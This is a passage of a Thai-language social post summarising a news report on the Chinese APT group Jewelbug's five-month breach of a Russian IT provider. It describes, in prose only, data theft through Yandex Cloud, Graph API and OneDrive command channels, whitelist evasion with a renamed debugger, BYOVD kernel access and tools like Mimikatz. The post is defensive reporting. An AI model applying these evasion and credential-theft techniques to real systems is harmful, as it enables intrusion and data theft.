อัปโหลดรายการไฟล์, และเก็บข้อมูลระบบ เช่น IP และเวอร์ชัน Windows ในแคมเปญก่อนหน้านี้ Jewelbug ยังใช้เทคนิค BYOVD (Bring-Your-Own-Vulnerable-Driver) โดยนำไดรเวอร์จากระบบป้องกันเกม ECHOAC มาใช้เจาะระดับ kernel และใช้เครื่องมือเช่น KillAV, ShadowPad, Mimikatz และ Earthworm เพื่อเคลื่อนย้ายภายในระบบ การโจมตีครั้งนี้ไม่เพียงแต่แสดงถึงความสามารถของ Jewelbug แต่ยังชี้ให้เห็นถึงความเสี่ยงด้านซัพพลายเชนที่อาจส่งผลกระทบต่อบริษัทลูกค้าของผู้ให้บริการ IT รัสเซียจำนวนมาก ✅ ข้อมูลในข่าว ➡️ Jewelbug เป็นกลุ่ม APT จากจีนที่แฮกระบบบริษัท IT รัสเซียได้นานถึง 5 เดือน ➡️ ใช้ Yandex Cloud ในการส่งข้อมูลออกเพื่อหลบเลี่ยงการตรวจจับ ➡️ ใช้ไฟล์ “7zup.exe” ซึ่งเป็น cdb.exe ที่ถูกเปลี่ยนชื่อเพื่อหลบ whitelist ➡️ ใช้ scheduled tasks, credential dumping, log clearing และไฟล์ “yandex2.exe” ในการโจมตี ➡️ พบมัลแวร์ใหม่ที่ใช้ Microsoft Graph API และ OneDrive เป็นช่องทางควบคุม (C2) ➡️ มัลแวร์สามารถสร้างโฟลเดอร์ลับ, อัปโหลดไฟล์, และเก็บข้อมูลระบบ ➡️ ในแคมเปญก่อนหน้านี้ Jewelbug ใช้เทคนิค BYOVD โดยนำไดรเวอร์ ECHOAC มาใช้เจาะระดับ kernel ➡️ ใช้เครื่องมือเช่น KillAV, ShadowPad, Mimikatz, SMBExec และ Earthworm ➡️ มัลแวร์ถูกฝังใน mspaint.exe ซึ่งเป็นเทคนิคเฉพาะของ Jewelbug ➡️ มีความเสี่ยงด้านซัพพลายเชนที่อาจส่งผลต่อบริษัทลูกค้าจำนวนมากในรัสเซีย ➡️ การโจมตีสะท้อนถึงการเปลี่ยนแปลงเชิงยุทธศาสตร์ของจีนหลังสงครามยูเครน ‼️ คำเตือนจากข้อมูลข่าว ⛔ การใช้บริการคลาวด์ที่ได้รับความนิยมในประเทศเป้าหมายอาจทำให้การตรวจจับยากขึ้น ⛔ การเปลี่ยนชื่อไฟล์ระบบเพื่อหลบ whitelist เป็นเทคนิคที่สามารถใช้ได้กับหลายองค์กร ⛔ การใช้ Graph API และ OneDrive เป็นช่องทางควบคุมอาจทำให้มัลแวร์พรางตัวได้ดีในทราฟฟิกปกติ ⛔ การใช้เทคนิค BYOVD และเครื่องมือเจาะระบบระดับ kernel อาจทำให้ระบบป้องกันทั่วไปไม่สามารถตรวจจับได้ ⛔ ความเสี่ยงด้านซัพพลายเชนอาจขยายผลไปยังบริษัทอื่น ๆ ที่เชื่อมโยงกับผู้ให้บริการที่ถูกแฮก ⛔ การฝังมัลแวร์ในโปรแกรมทั่วไปอย่าง mspaint.exe ทำให้ผู้ใช้ไม่สงสัยและยากต่อการตรวจสอบ https://securityonline.info/chinas-jewelbug-apt-breaches-russian-it-provider-for-5-months-using-yandex-cloud-and-graph-api-c2/
    SECURITYONLINE.INFO
    China's Jewelbug APT Breaches Russian IT Provider for 5 Months, Using Yandex Cloud and Graph API C2
    Symantec exposed China's Jewelbug APT in an unprecedented 5-month intrusion on a Russian IT provider. The group used Yandex Cloud for data exfiltration and Graph API for stealthy C2 via custom malware.
    0 ความคิดเห็น 0 การแบ่งปัน 134 มุมมอง 0 รีวิว
Pages Boosts